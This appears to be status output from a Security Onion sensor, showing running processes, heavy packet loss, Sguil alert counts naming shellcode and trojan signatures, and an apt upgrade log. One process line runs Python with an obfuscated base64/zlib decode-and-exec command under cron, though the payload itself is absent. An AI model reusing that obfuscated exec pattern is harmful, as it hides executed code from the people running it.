0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.0 /var/ossec/bin/ossec-monitord
0.0 0.0 /bin/sh -c sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-syslog-ng.sh
0.0 0.0 sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-syslog-ng.sh
0.0 0.0 [kworker/2:1H]
0.0 0.0 /usr/sbin/cupsd -f
0.0 0.0 /usr/bin/ssh-agent -s
0.0 0.0 /usr/lib/upower/upowerd
0.0 0.0 /usr/lib/udisks2/udisksd --no-debug
0.0 0.0 init --user --startup-event indicator-services-start
0.0 0.0 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 117:126
0.0 1.4 /usr/sbin/apache2 -k start
0.0 0.0 /sbin/getty -8 38400 tty1
0.0 0.0 [kworker/1:1H]
0.0 0.0 su - SO-user -- /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 su - SO-user -- /usr/bin/ossec_agent.tcl -o -f /var/ossec/logs/alerts/alerts.log -i X.X.X.X -p 5 -c /etc/nsm/ossec/ossec_agent.conf
0.0 0.1 tclsh /usr/bin/ossec_agent.tcl -o -f /var/ossec/logs/alerts/alerts.log -i X.X.X.X -p 5 -c /etc/nsm/ossec/ossec_agent.conf
0.0 0.0 tail -n 0 -F /var/ossec/logs/alerts/alerts.log
0.0 0.0 su - SO-user -- /usr/bin/pcap_agent.tcl -c /etc/nsm/SO-server-eth1/pcap_agent.conf
0.0 0.0 tclsh /usr/bin/pcap_agent.tcl -c /etc/nsm/SO-server-eth1/pcap_agent.conf
0.0 0.0 su - SO-user -- /usr/bin/snort_agent.tcl -c /etc/nsm/SO-server-eth1/snort_agent-1.conf
0.0 0.0 tail -n 1 -f /nsm/sensor_data/SO-server-eth1/snort-1.stats
0.0 0.0 [kworker/0:0]
0.0 0.0 sshd: SO-user [priv]
0.0 0.0 sshd: SO-user@pts/4
0.0 0.0 -bash
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
0.0 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
0.0 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
0.0 0.0 lightdm --session-child 12 21
0.0 0.0 /usr/bin/gnome-keyring-daemon --daemonize --login
0.0 0.0 init --user
0.0 0.0 dbus-daemon --fork --session --address=unix:abstract=/tmp/dbus-yHYdmVL9u1
0.0 0.0 upstart-event-bridge
0.0 0.0 upstart-file-bridge --daemon --user
0.0 0.0 upstart-dbus-bridge --daemon --session --user --bus-name session
0.0 0.0 upstart-dbus-bridge --daemon --system --user --bus-name system
0.0 0.0 /usr/lib/at-spi2-core/at-spi-bus-launcher
0.0 0.0 /bin/dbus-daemon --config-file=/etc/at-spi2/accessibility.conf --nofork --print-address 3
0.0 0.0 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
0.0 0.0 /usr/lib/gvfs/gvfsd
0.0 0.0 /usr/lib/gvfs/gvfsd-fuse /run/user/1000/gvfs -f -o big_writes
0.0 0.0 /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/X11/xinit/xserverrc
0.0 0.0 xfce4-session
0.0 0.0 /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
0.0 0.0 /usr/bin/ssh-agent -s
0.0 0.1 xfwm4
0.0 0.1 xfce4-panel
0.0 0.3 Thunar --daemon
0.0 0.0 /usr/lib/x86_64-linux-gnu/indicator-power/indicator-power-service
0.0 0.0 light-locker
0.0 0.0 xfce4-power-manager
0.0 0.0 /usr/lib/x86_64-linux-gnu/indicator-application/indicator-application-service
0.0 0.0 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1
0.0 0.1 update-notifier
0.0 0.2 /usr/bin/python /usr/bin/blueman-applet
0.0 0.1 nm-applet
0.0 0.2 /usr/bin/python /usr/share/system-config-printer/applet.py
0.0 0.0 xfce4-volumed
0.0 0.1 xfsettingsd
0.0 0.0 /usr/bin/pulseaudio --start --log-target=syslog
0.0 0.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 4 16777249 systray Notification Area Area where notification icons appear
0.0 0.1 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libindicator-plugin.so 5 16777250 indicator Indicator Plugin Provides a panel area for Unity indicators. Indicators allow applications and system services to display their status and interact with the user.
0.0 0.0 init --user --startup-event indicator-services-start
0.0 0.0 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2
0.0 0.0 /usr/lib/gvfs/gvfs-udisks2-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-mtp-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-afc-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfsd-trash --spawner :1.8 /org/gtk/gvfs/exec_spaw/0
0.0 0.0 /usr/bin/obex-data-server --no-daemon
0.0 0.2 chromium-browser --type=zygote
0.0 0.1 chromium-browser --type=zygote
0.0 0.0 [kworker/3:0]
0.0 0.0 [kworker/1:4]
0.0 0.1 /usr/lib/x86_64-linux-gnu/tumbler-1/tumblerd
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 0.0 sudo sostat-redacted
0.0 0.0 /bin/bash /usr/bin/sostat-redacted
0.0 0.0 /bin/bash /usr/bin/sostat
0.0 0.0 sed -r s/(\b[0-9]{1,3}\.){3}[0-9]{1,3}\b/X.X.X.X/g
0.0 0.0 sed -r s/([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}/MM:MM:MM:MM:MM:MM/g
0.0 0.0 sed -r s/(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))\b/X.X.X.X/g
0.0 0.0 sed -r s/X:ssh_port/X:ssh_port/g
0.0 0.0 sed -r s/\*:ssh_port/*:ssh_port/g
0.0 0.0 sed -r s/SO-server/SO-server/g
0.0 0.0 sed -r s/SO-node/SO-node/g
0.0 0.0 sed -r s/SO-user|SO-user/SO-user/g
0.0 0.0 [kworker/0:1]
0.0 0.0 CRON
0.0 0.0 CRON
0.0 0.0 /bin/sh -c sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-cron.sh > /dev/null 2>&1
0.0 0.0 sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-cron.sh
0.0 0.0 /bin/sh -c /usr/sbin/so-bro-cron >> /var/log/nsm/so-bro-cron.log 2>&1
0.0 0.0 /bin/bash /usr/sbin/so-bro-cron
0.0 0.0 su SO-user -c /opt/bro/bin/broctl cron
0.0 0.0 sh
0.0 0.0 /usr/bin/python -c import zlib,base64; exec(zlib.decompress(base64.b64decode(b"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")))
0.0 0.0 ps -eo pcpu,pmem,args --sort -pcpu

=========================================================================
Packets received during last monitoring interval (600 seconds)
=========================================================================

eth1: 4979407

=========================================================================
Packet Loss Stats
=========================================================================

NIC:

eth1:

RX packets:56353787 dropped:0 TX packets:0 dropped:0

-------------------------------------------------------------------------

pf_ring:

Appl. Name : bro-eth1
Tot Packets : 34675530
Tot Pkt Lost : 62159


Appl. Name : snort-cluster-52-socket-0
Tot Packets : 34525973
Tot Pkt Lost : 21603700

-------------------------------------------------------------------------

IDS Engine (snort) packet drops:

/nsm/sensor_data/SO-server-eth1/snort-1.stats last reported pkt_drop_percent as 59.982
-------------------------------------------------------------------------


-------------------------------------------------------------------------

Netsniff-NG:
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +281087 Lost: -84828
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153675 Lost: -52729
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154609 Lost: -29468
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +141898 Lost: -67497
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149275 Lost: -50137
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152901 Lost: -87428
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163313 Lost: -52650
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152639 Lost: -8930
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157847 Lost: -77388
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151968 Lost: -55856
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +204140 Lost: -57843
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152290 Lost: -58986
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +171016 Lost: -115309
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153623 Lost: -44488
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +166983 Lost: -127872
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150231 Lost: -101962
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155714 Lost: -97126
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +144220 Lost: -78622
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158514 Lost: -23123
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156996 Lost: -130088
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157654 Lost: -67854
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157060 Lost: -88992
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151666 Lost: -152145
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154369 Lost: -219589
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150539 Lost: -67751
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162345 Lost: -105355
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154327 Lost: -167312
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155661 Lost: -75838
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163706 Lost: -50332
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158259 Lost: -32470
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156628 Lost: -89305
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159619 Lost: -89893
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154935 Lost: -32824
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +161616 Lost: -150161
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150788 Lost: -80130
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153007 Lost: -191410
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156020 Lost: -153183
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154653 Lost: -21881
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +168716 Lost: -88843
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155129 Lost: -155794
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154156 Lost: -21525
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +170767 Lost: -282004
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152312 Lost: -156235
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151800 Lost: -323131
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156651 Lost: -69671
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159133 Lost: -111679
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153811 Lost: -157958
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152442 Lost: -68448
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154479 Lost: -367559
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153201 Lost: -146661
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154612 Lost: -284389
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151621 Lost: -98944
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156913 Lost: -401066
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +160220 Lost: -196947
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150948 Lost: -194220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158654 Lost: -170584
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154511 Lost: -4798
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +171438 Lost: -49109
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152965 Lost: -94511
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154415 Lost: -158397
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150472 Lost: -87014
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +181953 Lost: -319597
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155490 Lost: -54181
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154236 Lost: -214645
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154378 Lost: -190112
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154606 Lost: -147184
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154932 Lost: -56900
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149442 Lost: -56543
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156239 Lost: -207813
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162749 Lost: -120312
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153262 Lost: -43779
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152895 Lost: -124177
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157192 Lost: -78728
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155885 Lost: -99228
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154574 Lost: -97527
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149461 Lost: -40833
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158258 Lost: -67950
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151817 Lost: -53498
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151833 Lost: -65108
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150379 Lost: -56513
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163113 Lost: -128011
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +164900 Lost: -52247
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155976 Lost: -240717
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155348 Lost: -146285
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155486 Lost: -183885
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154410 Lost: -112444
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152535 Lost: -137474
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153837 Lost: -8714
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158562 Lost: -91344
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155802 Lost: -138584
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153267 Lost: -169563
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150112 Lost: -120893
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +165912 Lost: -190196
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158494 Lost: -14316
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162094 Lost: -82767
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153381 Lost: -253637
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158809 Lost: -140933
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158387 Lost: -103296
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +165453 Lost: -218529
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150309 Lost: -249883
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153836 Lost: -26062
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157252 Lost: -171448
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155483 Lost: -270732
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154217 Lost: -197405
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154570 Lost: -303347
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152260 Lost: -182846
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154920 Lost: -153915
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155554 Lost: -176945
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157189 Lost: -124202
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159435 Lost: -196643
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156949 Lost: -26469
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +160441 Lost: -116791
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156311 Lost: -41854
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +166929 Lost: -215139
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157383 Lost: -239468
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152067 Lost: -30521
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151948 Lost: -47211
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157341 Lost: -238247
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157204 Lost: -146132
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150749 Lost: -157308
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152474 Lost: -204891
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814035214 Processed: +225581 Lost: -29388
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814035214 Processed: +154392 Lost: -12750
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +244863 Lost: -18107
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156780 Lost: -49606
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152666 Lost: -115945
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +165067 Lost: -10979
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +203398 Lost: -82552
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +145210 Lost: -31184
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +160493 Lost: -150432
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +171957 Lost: -208898
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154579 Lost: -37074
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +200343 Lost: -15445
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +161059 Lost: -170284
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +116291 Lost: -55688
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +144739 Lost: -29414
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +119307 Lost: -8220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +217198 Lost: -266748
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +119169 Lost: -1233
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +186692 Lost: -36804
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +159937 Lost: -166349
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154573 Lost: -12746
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +146880 Lost: -170568
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156046 Lost: -99220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +131688 Lost: -30925
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +149258 Lost: -41035
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +170429 Lost: -95190
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +148444 Lost: -69031
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154177 Lost: -7813
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +184301 Lost: -72774
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +163189 Lost: -116529
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +157240 Lost: -168891
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +155869 Lost: -70119
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152651 Lost: -38884
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +147671 Lost: -68387
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +159191 Lost: -279033
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154387 Lost: -156815
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +148401 Lost: -34349
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156319 Lost: -42639
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +151356 Lost: -135694
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154847 Lost: -171976
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152676 Lost: -34167
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154880 Lost: -6362
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +160433 Lost: -144546
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +161637 Lost: -213360
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +158114 Lost: -18337

=========================================================================
PF_RING
=========================================================================
PF_RING Version : 6.4.1 (unknown)
Total rings : 2

Standard (non ZC) Options
Ring slots : 4096
Slot version : 16
Capture TX : Yes [RX+TX]
IP Defragment : No
Socket Mode : Standard
Total plugins : 0
Cluster Fragment Queue : 0
Cluster Fragment Discard : 0

=========================================================================
Log Archive
=========================================================================
/nsm/sensor_data/SO-server-eth0/dailylogs/ - 0 days
4.0K .

/nsm/sensor_data/SO-server-eth1/dailylogs/ - 1 days
30G .
30G ./2016-08-14

/nsm/bro/logs/ - 1 days
516K .
260K ./2016-08-14
252K ./stats

=========================================================================
Sguil Uncategorized Events
=========================================================================
COUNT(*)
432801

=========================================================================
Sguil events summary for yesterday
=========================================================================
Total
0

=========================================================================
Top 50 All time Sguil Events
=========================================================================
Totals GenID:SigID Signature
340570 1:2012088 ET SHELLCODE Possible Call with No Offset TCP Shellcode
317031 1:2100651 GPL SHELLCODE x86 stealth NOOP
61 1:2000419 ET POLICY PE EXE or DLL Windows file download
41 1:2014939 ET POLICY DNS Query for TOR Hidden Domain .SO-server Accessible Via TOR
4 1:2021874 ET TROJAN Linux/dtool IRC Command (UDPFLOOD)
4 1:2021873 ET TROJAN Linux/dtool IRC Command (TCPFLOOD)
4 1:2021872 ET TROJAN Linux/dtool IRC Command (HTTPFLOOD)
3 1:2000418 ET POLICY Executable and linking format (ELF) file download
2 1:2021915 ET TROJAN ELF/muBoT IRC Activity 4
2 1:2013028 ET POLICY curl User-Agent Outbound
2 1:2021879 ET TROJAN Linux/dtool IRC Command (STOP)
Total
657725

=========================================================================
Last update
=========================================================================

Start-Date: 2016-08-01 16:35:24
Commandline: apt-get -y dist-upgrade
Upgrade: securitySO-server-suricata:amd64 (3.0.1-1ubuntu1securitySO-server1, 3.1.1-1ubuntu1securitySO-server1), kpartx:amd64 (0.4.9-3ubuntu7.12, 0.4.9-3ubuntu7.13), mysql-client-core-5.5:amd64 (5.5.49-0ubuntu0.14.04.1, 5.5.50-0ubuntu0.14.04.1), securitySO-server-pfring-ld:amd64 (20120827-0ubuntu0securitySO-server9, 20120827-0ubuntu0securitySO-server10), isc-dhcp-common:amd64 (4.2.4-7ubuntu12.4, 4.2.4-7ubuntu12.5), dpkg:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), securitySO-server-capme:amd64 (20121213-0ubuntu0securitySO-server59, 20121213-0ubuntu0securitySO-server60), dkms:amd64 (X.X.X.X-1.1ubuntu5.14.04.5, X.X.X.X-1.1ubuntu5.14.04.7), libdrm-intel1:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libarchive13:amd64 (3.1.2-7ubuntu2.2, 3.1.2-7ubuntu2.3), gimp:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), dpkg-dev:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), libdrm-radeon1:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libgimp2.0:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), securitySO-server-nsmnow-admin-scripts:amd64 (20120724-0ubuntu0securitySO-server134, 20120724-0ubuntu0securitySO-server138), grub-common:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), libnspr4:amd64 (4.10.10-0ubuntu0.14.04.1, 4.12-0ubuntu0.14.04.1), libnss3-1d:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), base-files:amd64 (7.2ubuntu5.4, 7.2ubuntu5.5), curl:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7), libimobiledevice4:amd64 (1.1.5+git20140313.bafe6a9e-0ubuntu1, 1.1.5+git20140313.bafe6a9e-0ubuntu1.1), 